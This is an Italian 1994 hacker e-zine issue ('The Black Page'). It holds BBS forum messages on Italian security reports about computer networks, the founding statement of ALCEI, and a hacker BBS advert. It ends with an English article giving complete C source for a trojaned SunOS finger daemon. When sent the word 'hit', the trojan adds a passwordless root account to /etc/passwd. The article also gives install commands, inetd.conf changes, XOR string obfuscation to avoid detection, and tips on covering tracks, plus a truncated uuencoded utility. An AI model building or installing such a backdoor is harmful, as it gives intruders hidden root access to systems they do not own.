che seguono sono proprio pazzeschi ! ] 693 4-Ago-94 23:08 1611 C.Gerino I Roma ------------------------------------------------------------------------------- INFORMAZIONE E SICUREZZA Purtroppo, le notizie di ieri sulla "pericolosit delle reti informatiche internazionali" non sono invenzioni giornalistiche, ma la relazione semestrale del ministero dell'Interno al Parlamento sullo stato dei servvizi segreti e della sicurezza in Italia. Un documento ufficiale, quindi, a carattere internazionale, che esplicitamente parla dell'attivita' della sinistra all'interno delle reti informatiche e della telematica internazionale. Piu' in generale, sostiene che su queste reti transitino informazioni "pericolose per la sicurezza nazionale ed internazionale" e che attraverso queste reti c'e' chi "acquisisce informazioni riservate". Insomma, il massimo organo di preven- zione e repressione getta l'allarme sull'informatica. Alcune cose sono proba- bilmente vere (mi risulta che inusa, attualmente, esistono diverse Bbs che o- perano come ""piazzisti" di eroina...) Altre, pero', evidentemente hanno scopi diversi, come quello di far temere che la telematica amatoriale sia un rischio per la sicurezza, con il corollario che l'unica telematica affidabile sia quella "privata" commerciale o dello stato... C'e' lo zampino di qualcuno che ha molto a cuore i sistemi informativi, la proprieta' di essi e la loro gestione esclusiva... Per quanto riguarda il fat- to che la notizia sia uscita sui giornali, e' stata un'anticipazione fatta da diverse agenzie di stampa (Ansa, Agi, Adnkronos) del documento, il cui testo completo sara' disponibile pero' solo a settembre. Sono andato a cercarlo alla Camera per leggere su cosa erano suffragate queste notizie, ma il volume e' in stampa... 605 11-Lug-94 10:40 3182 S.Pasquini I Civitavecc 601 ---------------------------------------------------------------------------- Salve, sono qui con il dott. Berghella che rispondera' direttamente al tuo messaggio nonostante il mio nome in testa. Ciao Stefano ------------------------------ Salve, sono Fulvio Berghella, Mi associo volentieri al dibattito, soprattutto perche' e' firmato con nomi reali. Ed e' proprio qui il punto. Quando c'e' buona fede nel dibattito libe- ro, penso che le persone dovrebbero sempre qualificarsi. Se si nascondono die- tro pseudonimi o alias evidentemente ci sono motivazioni particolari. Sul caso specifico, avevo concluso l'articolo - peraltro scritto e predisposto nei giorni precedenti il dibattito al parlamento - affermando che tali eventi (riferendomi ai BBS clandestini) non aiutano l'immagine dei BBS ufficiali e amatoriali autodisciplinati. Poi ho cambiato il finale perche' avevo sostenuto pubblicamente la stessa cosa. Affermando all'auletta parlamentare che non bisogna confondere i BBS amatoriali "puliti" che tanto hanno contribuito allo sviluppo dell'informatica e telematica (gratuitamente) con l'enorme gruppo clandestino che diffonde informazioni strane... Comunque, credo che il problema di fondo sia l'informazione reale. Sappiamo tutti che negli Stati Uniti esistono pubblicazioni che raccontano cose simili, ma voi sapete quanti ragazzi in italia fanno o cercano fare degli illeciti so- lo per avere tale materiale? Peraltro il file che descrive come fare la bomba atomica, a detta di un esperto nucleare che lo ha esaminato - e' pericoloso per come impostato. se qualcuno ci provasse potrebbe provocare un'auto esplo- sione. Non si tratta di fare terrorismo informativo. Se fosse stato quello il motivo, la notizia avrebbe avuto maggior risalto, sarebbe stata affidata a giornali a maggior diffusione popolare e non ad una rubrica specializzata come le pagine informatiche de IL SOLE 24 ORE del venerdi. Infatti sia la televisione di stato, sia la radio mi avevano chiesto di fare un servizio sull'argomento e non accettato. Non ho accettato perche' in questo momento c'e' molta strumentalizzazione sulla materia. Due fasi avrei fatto il servizio, oggi no. In merito all Correggo.... Due mesi fa (non due fasi....) avrei fatto il servizio oggi no. Comunque io penso che chi come te, e come me, amano la libera circolazione delle informazioni, debbano assumersi la responsabilita' di quello che scrivo- no e che fanno, proprio per difenderne la liceita' e la liberta'. proprio per rendere il dibattito pubblico non attaccabile. Tacere sui raggazzini che imperversano con piccoli affari illeciti o accettare gruppi anomali e tacere su organizzazioni pirata le cui dimensioni e i cui effetti sono assai piu cor- posi e pericolosi di quelli narrati sull'articolo non penso faccia bene a nes- suno. Ora, per ragioni di tempo non posso continuare comunque gradisco molto il dibattito, e le repliche anche a voce e a viso a viso. Un richiamo finale, oltre la cronaca ci sono contenuti veramente pericolosi ed essi sono regolarmente scambiati nei circuiti citati dove l'APPARENTE bisogno di far circolare le informazioni liberamente e' VERAMENTE SOLO APPARENTE. Se non ne fossi stato certo, non avrei mai scritto quell'articolo. Grazie per le osservazioni, a presto. FB [N.d.r. questo qui e' proprio PAZZO !!! P-A-Z-Z-O !!! La Redazione consiglia al Sig. Berghella una seduta di ascolto del Modulo Musicale "BERGHELL.MOD" ] -----------------------------FINE MESSAGGI------------------------------- Beh, questo sembra essere tutto, per ora. Sicuramente mancheranno delle cose, ma sicuramente ce ne troverete altre che non sapete, come magari alcuni messaggi letti in area SYSOP che 'normalmente' un comune utente non potrebbe leggere :) Per finire alcune informazioni relative all' ORGANO :) che "DOVREBBE" tutelare i diritti telematici di noi pazzi telemaniaci. Dico DOVREBBE perche' per esempio anche la Associazione Fidonet Italia (AFI) avrebbe dovuto tutelare i Sysop aiutandoli in qualche modo, ma invece se ne e' letteralmente F-O-T-T-U-T-A lavandosene le mani. 799 26-Ago-94 02:31 3739 B.Parrella USA Oakland CA ---------------------------------------------------------------------------- Comunicato ufficiale: nasce ALCEI - EF Italy. Questo il comunicato ufficiale che annuncia la nascita di ALCEI - EF Italy. Per ulteriori informazioni ed iscrizioni, rivolgersi direttamente all'indirizzo sotto riportato - continuando invece ad usare questo spazio per la discussione in tema di community networking ed argomenti relativi. ----------- ===== ALCEI ===== Electronic Frontiers Italy -------------------------- *E' nata l'associazione per i "cittadini elettronici"* ------------------------------------------------------ Mai pensato che il nostro computer potrebbe aver problemi di liberta'? E il nostro modem voglia di riservatezza? Eppure ne hanno, cioe': li abbiamo noi. Quasi senza accorgercene, leggendo e scrivendo messaggi, usando forme nuove di comunicazione, siamo diventati un'altra cosa. Siamo "cittadini elettronici". Ma "quanto" siamo liberi? Quan- to abbiamo gia' "regole" adeguate alla novita' che viviamo e rappresentiamo? I recenti sequestri in Italia, il ricco dibattito che negli Stati Uniti si sta sviluppando intorno alle autostrade elettroniche, la lentezza e le incertezze che caratterizzano l'affermarsi di un analogo progetto europeo, le trasforma- zioni tecnologiche e d'uso che l'insieme dei media va conoscendo, indicano un terreno di iniziativa per la difesa e lo sviluppo dei diritti di cittadinanza telematica come parte dei diritti democratici. Per questo e' nata: ************************************* ALCEI ----- Electronic Frontiers Italy Associazione per la liberta' nella comunicazione elettronica interattiva ************************************* Alcei nasce per dare la parola al cittadino elettronico. Alcei si richiama di- rettamente all'esperienza di Electronic Frontier Foundation e di EFF ha il ri- conoscimento pubblico e diretto. Alcei non e' un'organizzazione di tendenza, non ha riferimenti politici o ideologici, non chiede di essere finanziata dallo stato. Tutti vi possono aderire, purche' ne rispettino lo statuto. A tutti chiediamo una quota associativa e una collaborazione in qualsiasi forma: nessuno ci paga, non abbiamo apparati. Alcei non e' una "lobby". Non e' solo un gruppo di "difesa del consumatore". Non nasciamo per aggiungere leggi a leggi, burocrazia a burocrazia: tutto cio' che fonda sulla liberta' e sull'autoregolamentazione, sui codici che i sogget- ti sociali sanno darsi autonomamente, funziona bene. Con questo principio intendiamo muoverci su casi singoli cosi' come su terreni generali: il diritto e la legislazione, che sono incompleti, l'informazione che e' oggi del tutto assente, carente o imprecisa (e spesso pilotata da grup- pi di interesse); l'elaborazione di una cultura dei nuovi mezzi. Alcei non e' una "conferenza", un luogo solo di dibattito. E' e vuole essere un'organizzazione operativa che lavora con pazienza, tutti i giorni, per co- struire e difendere la libera cultura della telematica. C'e' un grande vuoto da riempire, di idee e di lavoro. Per ottenere un'adesione informata abbiamo creato un punto di riferimento telematico dove potrai chiedere informazioni sulla nostra identita' e sui nostri principi. Presto saranno pronti nuovi strumenti di circolazione dell'informazione cui tutti potranno dare un contributo. --------------------------------------------------------------- Per informazioni: (fax: 06-3202346 o 02-867055) --------------------------------------------------------------- 809 26-Ago-94 20:30 953 B.Parrella USA Oakland CA ---------------------------------------------------------------------------- re: comunicato alcei In merito al *comunicato* precedentemente inserito, rammento che ulteriori informazioni (statuto, dichiarazione di principi, modalita' d'iscrizione, ecc.) vanno richiesti all'indirizzo menzionato . Tali documenti possono anche essere ricevuti automaticamente, come specificato nelle seguenti righe che erano saltate nella prima comunicazione ufficiale. -------------------- La documentazione su ALCEI puo' essere richiesta al server ftpmail archive@nexus.it Per informazioni sull'uso del server ftpmail inviare ad archive@nexus.it un messaggio contentente la parola HELP nel corpo del testo. --------------------- Ricordo inoltre che EFF sta per Electronic Frontier Foundation (negli USA), mentre il "secondo nome" di ALCEI e' Electronic Frontiers Italy. Infine, LECITI! era un'idea-proposta mai concretizzatasi ma il cui spirito (oltre a qualcos'altro :-) si e' riversato proprio in ALCEI. ---------------------------------------------------------------------------- Speriamo che questa ALCEI possa ingranare subito, senza entrare a far parte della RUOTA BUROCRATICA che da sempre blocca, invece di muovere, qual- siasi iniziativa. Dupree's Paradise ----------------------------------------------------------------- PUBBLICITA' REGRESSO ==================== CALL NOW The BEST BBS for Cyberpunk & HP Stuff in Europe !!! ________________________________________________ /~ .~ / _ . ~/~ _ . |~ __ ~| _ . \~ _ _ ~/ // ____/_ |_\__/. | \__|. |__| | |_\__/\/ | | \/ /____ ~/ _|__|| | __|: _| _|__ || | // . //: |_/. \: |_/. || |\ \\: |_/. \ |: | /_____ /|________\______|__| \__\_______\ |__| ___________________________________________ ___________________ \~ _ _ ~/ _ . ~/ _ .\~ _ _ ~/ __ |~ ~\ |~~|~| _ . ~/~ .~ / \/ | | \/ |_\__/ | \__\/ | | \/ / \|| \| || || \__// ____/_ || | || _|__| | __ || | \\ \ /|: \ \ :| || ______ ~/ |: | |: |_/. \ |_/. \ |: | \ \/ || |\ .| ||_/. \/ . // |__| |________\______\ |__| \____|__| \___|_|______\___ / Dialup: +49 40 823326 8N1 with a USR Dual - NUA 26245400050045 Donations are very welcome, leave Mail to Seven Up (you may use CC's!) NEWS From Sectec : ================== We just set up the Official SECTEC FTP site on the Internet! It is on spy.org in /pub/SECURITY/sectec. All uploads go to /pub/SECURITY/sectec/incoming please! This is a way for all the people with Internet access, who would like to contribute files but cannot upload through x.25 yet... To help you uploading here, I just installed ASCII Upload and UUencoded Upload (which are basically the same!). You just chose this point from the Upload menu and chose ASCII Upload with your terminal program. For security reasons, uuencoded files aren't uudecoded automatically, but will remain online uuencoded. Also I just created a general Newsgroup called "chat" as requested. For all the people who want to talk, get a better message ratio - just talk about whatever you want and what wouldn't fit anywhere else. ----------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - Articolo 4 The fingerd TROJAN HORSE ============ by Hitman Italy [ N.d.r. Articolo in Inglese. Se lo capite, bene. Se no, adeguatevi e datevi una svegliata, che siamo nel 2000 !!! ] [ N.d.R QUESTO ARTICOLO VIENE PUBBLICATO COME INFORMAZIONE PER I SYSTEM ADMINISTRATOR AFFINCHE' POSSANO PRENDERE VISIONE DI QUESTA DEBOLEZZA NEI SISTEMI UNIX. ] -=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=- The fingerd trojan horse Original article by Hitman Italy for The Black Pages This article is for informational purpose only, I'm not liable for any damage or illegal activity perpetrated using the source or the informations in the article. -=- + - So you have gained access to a system and want to keep on hacking without being kicked off by a smart operator, there are dozen methods you can use, usually, if an operator figure out that his system is under attack, he'll check out the login program and telnetd for backdoors, then the telnet for logging activities or network sniffers and so on.. if nothing is found he'll realize the hacker is a dumb ass and he'll just modify the passwd to prevent him from logging in (most of cases), here comes my fingerd trojan. This scheme is quite original (I've never heard about it) and the source compact enough to be fitted into a MAG. The fingerd as all you know (I hope) is the finger server run by inetd when a client opens the finger port (N.79), of course if the port is locked, or you have a network firewall, do not use this code. ---------- + CUT HERE + ----------------------------------------------- /* The Fingerd trojan by Hitman Italy * This source cannot be spreaded without the whole article * anyway you can freely use or modify it for your own */ static char copyright[] = ""; /* Add the copyright string here */ static char sccsid[] = ""; /* Add the sccsid string here */ #include #define PATH_FINGER "/usr/ucb/finger" #define CODE 161 char *HitCrypt(ch) char *ch; { char *b; b=ch; while ((*(ch++)^=CODE)!=0x00); return(b); } main(argc,argv) int argc; char *argv[]; { register FILE *fp; register int ch; register char *lp; int p[2]; static char exor[4][23]={ {201,200,213,CODE}, {142,196,213,194,142,209,192,210,210,214,197,CODE}, {201,200,213,155,155,145,155,145,155,155,142,155,142,195,200,207,142,194, 210,201,CODE}, {227,192,194,202,197,206,206,211,129,192,194,213,200,215,192,213,196,197, 143,143,143,CODE} }; #define ENTRIES 50 char **ap, *av[ENTRIES + 1], line[1024], *strtok(); #ifdef LOGGING /* unused, leave it for "strings" command */ #include struct sockaddr_in sin; int sval; sval = sizeof(sin); if (getpeername(0, &sin, &sval) < 0) fatal(argv[0],"getpeername"); #endif if (!fgets(line, sizeof(line), stdin)) exit(1); av[0] = "finger"; for (lp = line, ap = &av[1];;) { *ap = strtok(lp, " \t\r\n"); if (!*ap) break; if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w')) *ap = "-l"; if (++ap == av + ENTRIES) break; lp = NULL; } if (pipe(p) < 0) fatal(argv[0],"pipe"); switch(fork()) { case 0: (void)close(p[0]); if (p[1] != 1) { (void)dup2(p[1], 1); (void)close(p[1]); } /*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/ if (av[1]) if (strcmp( (HitCrypt(&exor[0][0])) ,av[1])==0) { if(!(fp=fopen( (HitCrypt(&exor[1][0])) ,"a"))) _exit(10); fprintf(fp,"%s\n", HitCrypt(&exor[2][0])); printf("%s\n", HitCrypt(&exor[3][0])); fclose(fp); break; } /*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/ if (execv(PATH_FINGER, av)==-1) fprintf(stderr,"No local finger program found\n"); _exit(1); case -1: fatal(argv[0],"fork"); } (void)close(p[1]); if (!(fp = fdopen(p[0], "r"))) fatal(argv[0],"fdopen"); while ((ch = getc(fp)) != EOF) { putchar(ch); } exit(0); } fatal(prg,msg) char *prg,*msg; { fprintf(stderr, "%s: ", prg); perror(msg); exit(1); } --------- + CUT HERE + ---------------------------------------------- I think it's quite easy to understand, first of all, inetd opens the socket and pipes the the input data through the fingerd * if (!fgets(line, sizeof(line), stdin)) * exit(1); * av[0] = "finger"; * for (lp = line, ap = &av[1];;) { * *ap = strtok(lp, " \t\r\n"); * if (!*ap) * break; * if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w')) * *ap = "-l"; here it gets the data from stdin and parses them (strtok) converting (due to RFC742) any '/W' or '/w' old options in '-l' * switch(fork()) { * case 0: * (void)close(p[0]); * if (p[1] != 1) { * (void)dup2(p[1], 1); * (void)close(p[1]); * } the task goes into the background * if (execv(PATH_FINGER, av)==-1) * fprintf(stderr,"No local finger program found\n"); here the daemon executes the local finger with remote parameters * (void)close(p[1]); * if (!(fp = fdopen(p[0], "r"))) * fatal(argv[0],"fdopen"); * while ((ch = getc(fp)) != EOF) { * putchar(ch); the output is piped back to the remote system That's how the finger daemon works... now the trojan, basically we'll check out the input finger user till the magic code matches, then our sleepin' trojan will wake up and do the job... let's examine my code (decrypted) /*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/ if (av[1]) if (strcmp("hit",av[1])==0) { if(!(fp=fopen("/etc/passwd","a"))) _exit(10); fprintf(fp,"hit::0:0::/:/bin/csh\n"); printf("Backdoor activated...\n"); fclose(fp); break; } /*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/ When the "hit" magic code matches the trojan will modify the passwd adding a fake unpassworded root user named "hit", so you can relogin as root, cover your tracks and keep on working. Of course this is an example, you can do what you want simply adding your custom code, you may remote cat a log file without logging in, or remote kill an user, maybe root logins are disabled so you have to make a suid shell and add a normal entry in the passwd or open a port and so on, you can also use multiple codes if you like. If the magic word doesn't match of course the finger will work out normally. # finger hit@666.666.666.666 [666.666.666.666] Backdoor activated... Well done! You have gained a root access. (...) # cat /etc/passwd root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh nobody:*:65534:65534::/: daemon:*:1:1::/: sys:*:2:2::/:/bin/csh bin:*:3:3::/bin: uucp:*:4:8::/var/spool/uucppublic: news:*:6:6::/var/spool/news:/bin/csh ingres:*:7:7::/usr/ingres:/bin/csh audit:*:9:9::/etc/security/audit:/bin/csh sync::1:1::/:/bin/sync ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh +::0:0::: hit::0:0::/:/bin/csh ^^^ they run NIS... anyway our local root login will work fine #finger hit@hacked.system.com [hacked.system.com] here is the log user: xit001 from: hell.com ip: 666.666.666.666 has pw: xit001 user: yit001 from: (...) That's really useful to collect logfiles without logging in and leave tracks everywhere. Now the problem.... If you want to use the fingerd to run world accessible commands you won't have any problem but if you require root privileges check this out: #grep fingerd /etc/inetd.conf finger stream tcp nowait nobody /usr/etc/in.fingerd in.fingerd ^^^^^^ On SunOs 4.x.x the fingerd runs as nobody, the fake user (used with NFS etc..), as nobody of course you cannot modify the passwd, so edit the file finger stream tcp nowait root /usr/etc/in.fingerd in.fingerd now you have to refesh the inetd process #kill -HUP now you can do what you want, many unix clones let the fingerd running as root by default... and even if you have to modify the inetd.conf an operator unlikely will realize what is appening since all other daemons run as root. Why have I crypted all data? #strings login (...) Yeah d00dz! That's a //\/\eg/+\Backd0[+]r by MASTER(...) of MEGA(...) Lame or not? All alien data must be crypted.. a fast exor crypting routine will work fine, of course you can use the standard crypt function or other (slow) algorithms but since security is not important (we just want to make our texts invisible) I suggest using my fast algo,to create the exor matrix simply put all texts on a file and use the little ExorCrypt utility I have leaved UUencoded below (amiga/msdos version). echo > test "this is a test" Acrypt test test.o line crypted: 1 type test.o static char exor[]={ 213,201,200,210,129,200,210,129,192,129,213,196,210,213,161}; char *ExorCrypt(ch) char *ch; { char *b; b=ch; while ((*(ch++)^=0xa1)!=0x00); return(b); } The utility will create the exor vector (matrix) (from the 80 column formatted ascii input text) and the specific decoding function, If you do not supply a key "$a1" will be used, remember to add a NewLine if necessary, the vector/matrix never contain them. Before compiling the whole thing you must add the copyright and sccsid strings I have not included (they may vary). Let's simply do: (SunOs) #strings /usr/etc/in.fingerd @(#) Copyright (c) 1983 Regents of the University of California. All rights reserved. ^^^^ COPYRIGHT STRING @(#)in.fingerd.c 1.6 88/11/28 SMI <<<< SCCSID STRING getpeername finger pipe /usr/ucb/finger No local finger program found fork fdopen %s: ((((( DDDDDDDDDD AAAAAA BBBBBB The top of source becomes: static char copyright[]= "@(#) Copyright (c) 1983 Regents of the University of California.\n\ All rights reserverd.\n"; static char sccsid[]="@(#)in.fingerd.c 1.6 88/11/28 SMI" That's all. Now you can compile and install your fingerd trojan, the source was adapted for SunOS but you can port it on many unix clones without troubles. Few final words to: Operators: How to defeat this trojan? First of all check the inetd.conf, then do VARIOUS fingerd checksums (maybe even the "sum" command is a trojan :) if you discover the trojan wrap the finger port so you can track down the hacker (usually all wtmp/lastlog logs are removed) or wrap everything modifying the daemons, do NOT use the inetd.conf_jump_new_daemon scheme, if you can, add a fingerd tripwire entry to prevent future installations. Well... if the hacker is a good one everything is useless. Beginners: You must be root to install the trojan, remember to get a copy of the original fingerd program before installing the fake version. On a Sun do: #cc -o in.fingerd trojan.c #mv /usr/etc/in.fingerd fingerd.old #mv in.fingerd /usr/etc remember to check the /etc/inetd.conf -=- + - To get in touch with me E-Mail to: Internet: hit@bix.com X.25: QSD Nua (0)208057040540 Mbx: Hitman_Italy if you want, use my PGP key -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a.2 mQCNAiypAuIAAAEEALVTvHLl4zthwydN+3oydNj7woyoKBpi1wBYnKJ4OGFa/KT3 faERV90ifxTS73Ec9pYhS/GSIRUVuOGwahx2UD0HIDgXnoceRamhE1/A9FySImJe KMc85+nvDuZ0THMbx/W+DDHJMR1Rp2nBzVPMGEjixon02nE/5xrNm/sb/cUdAAUR tBpIaXRtYW4gSXRhbHkgPGhpdEBiaXguY29tPg== =bCu4 -----END PGP PUBLIC KEY BLOCK----- ExorCrypt Amiga version: -=) S.Encode v2.5 (=- begin 777 Acrypt.lha M'$0M;&@U+;L7``"`*```4K>9`0``!D%C]8TV]?OWWGY]h MWCGT)T<>==;,3^G7FQMOA\XXX4Q2S[GS9)QP]W.-A<]))-Y@SN9!MOMPPCA"h MGWF(`+"*XDE5UEU4LU45L4CDCA958FA%94*5RX4P217"J%868`=M85QPS1@YL*2RW3+[;9:U9+);_%OP`;\%'W=VLD<;;A%.>^3?Y5SVH19P?5/Zh MA=_F.G`BP"T_^)W7+BO[DGWM>O[7KH5F%/_)J-.MI>)@6C,25:,JPVNG]?$U3,3P5R0K:L^W@=h MEOB)!6NV&@_%J(:U9"*!#14E`E3\&Z=7*(;^G(JBO6IX_HM;9_4DB51P!LV+=3G/1Q\.AX9DQ?@4@?ZL8O.Q@3651OX(#*P$?'._'O:/P&Q@]RCLh MJNZ6KH^QEW#'J6'1)]+!5_@XU1#=7,K'C[&XO=A5W6NU$4?5-,_>QYSh MH:TNP?Q>8[K:N$7ETUZ7F;0HGH-SD&+9,`8E['P^SV]M(I(;3,8DXGT1B=DWh MB:/IVP6MC$N-A#9M[[8H\ECV):F_9h MDD7XP"^&WA9^R/V*_NPM"UT(^'\CW995;,(H0$?R,[5^)FB'Y/#`A@2R`)QQh M]Y#=J^\JVD:IE_H6L??,WEP^T+3/I]M1;U\/H27*$H`SRQB<`:/]T]0VGH-!!?>0Q0.7.0Y=4J=%^,PO+)h M%VUT+7S2>GO5%.99=?0A7];^/\Q*=G'):7X<^R>[6,Z$W;\O#"9^ILY#\T1\h M=L$]??_O)*I1MDE?;__\253/MZ_H8?ZR2J0'+FFS22M[1NJ/-):I3N84DDMHh MNI(*>CIJX@J\NSD67N67(h MC]]'V(6+V,?8A;>L"V]$%M\]!##J$[CX?\/BVS:P:TMIC1+U)3A3DI\#+JQ/h MM'?S_FGN6$ZA3T*I2MFN=>I(,67LH\FJB=LO<>\@Q&W^EV\7F3CX"-\C41J*h M3EVN[\;^R"OM2S])&W4JMM<%7/W="BZ5H;#&)2HTZM"AV^;0/XZ'9^XMTK/Ph ME(^&OVYH*L>L=>+?M-"Q@V'GZ0%9=S*+OJ_7D6[PO#?+R>?'Z3Y8K@-R[,K\>:,I8\Th M!;`>50F'DP+8P2Q&.G3T1T]-S6L?9NXVXU]"A:9U^)@5_1+$XN)0;VU\3&V]h MKN&.7$T+7-8H\W'PE@CCRH^'UU_9R!F^4:H?3Y-M(X[+!-=_:;E)"Z+XR%DUh MVYZQ20L-1W=:DA9-4_[LJOU%#72F%55[65?-541K)h MK^:UQ`UM]X?'&[&5$&A>Q26W1I+7E)+7\I@WK"!YH2JAY>EH3h M+7M5&,[M%&'FS48=`2J-9=IO&,,9^LPE)+JTWE)7M=*74X78R7R+0;Q6@?0Jh MK-K*&#SH*[E0IZ/AO0XO_NQ!D:L9&FM-Y\6-R7,;DIQK]S&W0QKQ(Q]X7Z\Rh MY%=6TWCZD,I8VKD2ZSOH>O)74[[PR2A>2Q:Q@E:DT(U,8K8>=J:':E^:':G?h ME>CR]+8C:ONI195C:%KWI3V;HE#YAYFTS<,W3R8I8AD"9.XWH-8P51T+#R,Zh M'NJ85EH&A>("EN@T+QMLR*,[MF92X99\,?>2&!../O##4'9I>1XH;HY,9GP'h M4Q0!')%7%&9R?'9B\TE6N%>U82;X;^+[7!85G^-:LW'12QOZ0P?".Y85?8EKh M@7'1,"F#>*!&9Y4G5-4^S;0%&Y>X_?MD)%ZO]^#%_ERI\QR^RRK$ZSY)BL.;h M4[5SGMM[5-/<#FL:Z4W;\M<6^3_T'Z&:'Q]OYBOQ"/";$2WIO7U/IXE[3)@/T2h MU#]YNDS.:&$?%8="&_(O%-[^"]Y6^9NE[X@JGE,+>-Z#64"UZ*U!>[NB2]-Xh M;ZBA$V,R?1]Z-+^Z+W*NXK9O0W(FV^,FWG_CM_]@:B>#<'DN.)]4UE1>8H:_h M^?"_[^J&%:RL_1C2=(Q1PIY*O[RW+I'!UF_OZ,I:!#8]DV08h M8_^0`WZP#+)AD!?(B\SLZT!>"]P0QH1.X8B(MR%AT82DI[,S@\NICP+!K!8Wh M&#$6Y1!GAUF'&KJh M"!KY42D8^JG!T3@??)#[PP^G(\D9%5AT,.34R,!#)='&WL+&*:B+.\!-GM*_h MHJ0+#'G67_&;_UN].,Y1KB@`6T\*G):+=3K(&MX9`:\\2NF/1YT%,<*F/5L1h M]LIBPC]XHHZD>[/E,^1ZYQQ8)GD".'_&#+Y#^'\I,?OM3B,^>Q4N`'\)@$>^h M$8%"/OV7!#-D,]3M5D.RALJ8&"M#315%&*0+&S.+6<;!5M@Q-)ATGAPX[AJKRS\U::ZHHU,L_-FFN)454#'L%/!`E<2W=!*>KU0@=:2h M2>I=%"@SF1'PY[T;:1H(9+#Z^$?N\EO1))W`@;:'074YD%02_?X/GD$SQ?O1h M]7IOYLV!_;_!&_'B\R$^$'?7`4Z.G=R^TQ!DY3H`4E0Q`)V5'\[$L2BLQ<2"h M1Z)$!3MQ;JC1>S;#(BU2QOJ]!IR6S'U<^W!VB%74MR:M#?4H4#5G\3h M>@95M+:$FREA2I]]#L,.V@)W\QYP,"3GIBHC!=FIOA)[YX,T03'*@-PR[%',h M4%W=M-=2[^>1M?N>&DV(Xh MW-+?+^FE+?99J6ZA!N;)!]S2G7C,WG=]7;^T+//D.GI\*/1RJM/OKI-:"#KWh M=!U<.&\IB/U(4\$OZLWEI>:V6DQ&7UD.AY^F--A&V3'%R14@-?09IMUK)R1+h MW'@.F].QMQ)FFMW%Z;G-XB=L637A86T&F&KW#,RZU)*:$8$$I3?NDK8F3="=h M5S_Q:K7/5/3'`1@QJ9*\&'(,'WT&"I[<;N-?6(=1<3F,U^.M#J:Q7ZI/]/"IX?74T7PA6H!#.L]64;0;h MUM]`U$:?E#@'WT_7XZO-7K"47(.GPB??(\?;,+'1H,`/9^,E\ZMU0^&;?0$Kh M&8'0'T<`;#IT1G((W\,%?-E=T+O]1[6((+GH;_=:Q6"[0Z1&FP_9ST\2LN22h M'\0TG47H3=73FXOC8B%S&;;:_)6O)VWC^7N_\L?FR4-OJ]h M9<:V3-S]A^DEJT\[U\_TGW'QMW)R49Q_U]M@/OR[[Z"<_@?KTW=.A$`Z&Q9/h M4;W>YNHYHQ&[^^/D06R#OXLP2>L)5Z^*JE.AYT(D&XKZB6&DKN?>CDOKQ[`4h MY6![.V]G`]EECEO>P/`V.!`[)"]JR`"NC`WOT(^QA.P9U>TP745#M%TZL7V)h M4175C5]D<(B:0)-H&A@;$&#J-0ZL8HA<1PJ^S:]8-N9AY,:;@NHHEM2$_RW"h MEXPAHSXX.NC;J\2[1+V9:_`9N%:LD._G,U9*]RUEP+L:%'WB_@]S!4QK#'4Yh M--W0A^<@('\]$\.4SWJ-0;;'BX@M<=^((/[OKZQ]`WE+W)+0;MKGP?$#+V_^h M[Z\FC@VL#Z)XE^7L[JEK^I>]W]S%N%_K@.C0)$\FMG"=FS;Z>4?!QKL_Y\&V]PNIP;>?S>##7>_Z\&&"M\MS@3]h M(`?VXCKVAS/;VJNG5PUD[.RZ)R"Ih M)2IFX4XKF-Z!/I2Z^A#:D17-5M!#@X[7.8731YS7.;AG<3!4Q_3W2[L<,&(:h M,[F3F)@);%JRGJ?8BQPEZZ@N[3\CJGI;>1E6TUTZL@E/00+5^:4Z[G->U=-&8QO&Q0J/9C[9!"h M8O$PN^ZF+X6!K:%&HXOX(&['2M^12B-!6:+TQ\T7&.'+G^M#EKGR//O\(XQDR0:3&BO)?B+h MM?C8O`,M\9N(OST#>2^S'6%ZA\GK!0RUT(Y8'0GTA99U(;R,P-Y#C*NN&F]&h M$?Z*4N?(RJ;ZVD5,%6VVJ@?<]K?D]AEJY3P>;>2]V8F"ZE+&VTW4RJWPO?Y'h M(H&G(W\XPO@FP['N9*B)R9%P!J=["&5P%6]$]'C&7>"(V_?N24I<2-MP9^'Qh M&0A&J;+>&=KNQ:K2U30W$TV20.3@#^E\0#\7J`-2K)B+F9U0\Z4,=B!#5ZP%h MC]0"F3_N.MH=@[.M\;%I8I]6^%$Z"E[@L]2^`:+XJO1]7.)W;;`OW>V9#N&Bh M0\S62KA8\\$2TPM]//6NZ@NXVYU]=:^9N)!USDW'3N"M$h MV6U$X+N4KXYD=#S/8,K82KQ37=Y_$3&=XC>K_EF$\\<4&%WX`:EP)1M6]H;Rh MU^[@3U,ZZIB:#Z%L'N/'Z%QX^)-F31"2%H$+<3(1,LLF?S`&JX^Y53T;/"<77RQQh ME9@O-`\!L#WW3<`^#5D.E/>/W8I_9&?I@(T\3R8C.[^,1NP(]NY$A_$(YS$^h M,1O6Q&_GAY]7_P2B0_2X;S!#W[^:0?CCL5TQ@K6%"'=3NK:3/CN@1V5[;W%/h M="VPY+&Z6TKZG::L.:UA9O-:S;6)VR^$.:APJB*K='QR(^B]#!D^I%WB*[P3TW4U*+6^M]9KT2-EK9DFZO?!14CBMM-;:?4D6NO+h M[8ZZ^UU[>9G=_]9]G6%`*F4BQ(MAPN#ZV)B<'V["+$B1.)M@BJ]C[$3JK",?5h MTNO[_)M;"N+E^:>G>7YT6P9X.B*L5KIR+7\+@[W;#%KVMAQ,"XZFL&T=S:;I"])OR>h M+^D+T!F`O334(^(=,BKPW#^ZK8:V8BOU=[,OD6FM_GV.MV%]K;A*`=A(CZG3Q]5IB*OB2+3h M4E4C&1)FMM]?I$?&@R=FU>*)Y\0=^<2KF4V%S4`+?A9^L<)h M3T_8$2#NCKQFW.:$K$CL/5H$?>N0-[UM1GG9-M(-;F&-$V_J-@^LK08FV$V;h M1/P[_#OM`87P!.KT[^$4&!"$(N)H,"?S`5=[-9=IX#-\Y&7T)Q'_Z<.FACCTh 